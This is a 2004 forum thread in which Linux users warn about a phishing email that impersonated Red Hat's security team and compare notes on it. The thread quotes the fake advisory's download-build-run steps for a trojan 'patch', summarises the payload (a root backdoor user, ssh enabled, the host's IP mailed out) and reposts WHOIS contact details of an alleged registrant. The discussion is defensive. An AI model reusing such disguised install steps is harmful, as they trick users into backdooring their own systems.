Fake Emails about Emergency Security Update

***ewdi*** · #1 24th October 2004, 11:17 PM

This is a WARNING, today i received an email from security@redhat.com containing emergency security patch notice. Please understand, that email DOES NOT come from REDHAT. it's from 2ens11.uta.edu mail server. I have contacted University of Texas at arlington (near where i live) about this malcious email.

Do not download and install the patch on that email.
www.fedora-redhat.com is not a redhat site, it's a site set up by this person to get you to download this file and install it on your system or server. The content of the file is unknown .

------------------------------------
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
° First download the patch from the Security RedHat mirror: wget http://www.fedora-redhat.com/fileuti...6.patch.tar.gz
° Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
° cd fileutils-1.0.6.patch
° make
° ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
---------------------------------------------------------------

This person who sent the email also registered the domain where you can download the FAKE patch

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Please look out for this kind of email as it could harm your system.

madpenguin · #2 24th October 2004, 11:27 PM

Thanks Ewdi! This is good info...

foolish · #3 24th October 2004, 11:40 PM

This is scary, and facinating. What does the patch really do?

sLydE · #4 24th October 2004, 11:41 PM

hmmm...I might have an extra pc laying around that I could load up with fedora and see what happens when I install the patch...

Jman · #5 25th October 2004, 12:41 AM

Several things make me suspicious about this.

The website is plainer than Red Hat or Fedora design
The website only lists this issue, aside from a couple links to home pages.
Red Hat does not refer to itself as RedHat on their website.
There is no fileutils package. ls and mkdir are in coreutils
The patch is a whopping 960 KB.
The patch has it's own makefile and huge binary file
The patch has something called a shell script compiler

There's no telling what this does, as it's binary. Do not install it.

james_in_denver · #6 25th October 2004, 12:45 AM

Yep,

very suspicious. looks like a Trojan horse.

Whoever did it could be in some pretty big legal trouble, especially since they are using the RedHat logo on the DL page, that's called trademark infringement.

jcstille · #7 25th October 2004, 01:24 AM

Good information. Can't wait to find out what it is though.

h4d · #8 25th October 2004, 01:43 AM

It's funny how the author even links to redhat.com and fedora.redhat.com

Code:

Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

yet no direct link to the actual discussion of the vulnerability. hmmmmmm!

v8s10blazer · #9 25th October 2004, 01:49 AM

I say we track that son of a b***h down and beat him to death with his keyboard... Im in oklahoma city, so it wouldnt be a far drive for me muuahaha

-andy

Bana · #10 25th October 2004, 02:55 AM

Wow, this is quite scary, I don't think I've ever heard anything like this for Linux, thanks for the heads up.

Also: would bugzilla be a good place to report this kind of exploit?

sailor · #11 25th October 2004, 03:08 AM

the source for the page had some server comments at the end of the html that indicate it maybe a geocities page?

<script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1098669866" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001524&t=1098669866" ALT=1 WIDTH=1 HEIGHT=1>

crackers · #12 25th October 2004, 03:49 AM

It's been pretty well dissected over at /.

The main payload creates a new user with root priviledges, makes sure ssh is running, mails the IP address to someone, then deletes it's work. It's very lame. We'll probably find out in the end that it's either some moron who actually thought he/she could get away with it or a student who is doing some study in OSS usage (or something) who's just as much a moron as the first type.

Either way, they weren't smart enough to cover their tracks very well and there's going to be some heads rolling...

tchung · #13 25th October 2004, 03:50 AM

This is from Red Hat Secuity Website - http://www.redhat.com/security/

23rd October 2004
Red Hat has been made aware that emails are circulating that pretend to come from the Red Hat Security Team. These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code. Official messages from the Red Hat security team are never sent unsolicited, are always sent from the address secalert@redhat.com, and are digitally signed by GPG. All official updates for Red Hat products are digitally signed and should not be installed unless they are correctly signed and the signature is verified. For more details see http://www.redhat.com/security/team/key.html.

Please be aware NOT to install any package you can't trust!

Thomas

mike · #14 25th October 2004, 05:12 AM

Here is the whois info:
Domain Name: FEDORA-REDHAT.COM
Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
Whois Server: whois.melbourneit.com
Referral URL: http://www.melbourneit.com
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Status: ACTIVE
Updated Date: 23-oct-2004
Creation Date: 23-oct-2004
Expiration Date: 23-oct-2005

And some domain info someone found on slashdot
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

**Finalzone** · #15 25th October 2004, 05:15 AM

Another flaw the cracker forgot is to use rpm since Red Hat recommand update with that format via either yum or up2date. You will never read that Red Hat uses tar.gz to update the package.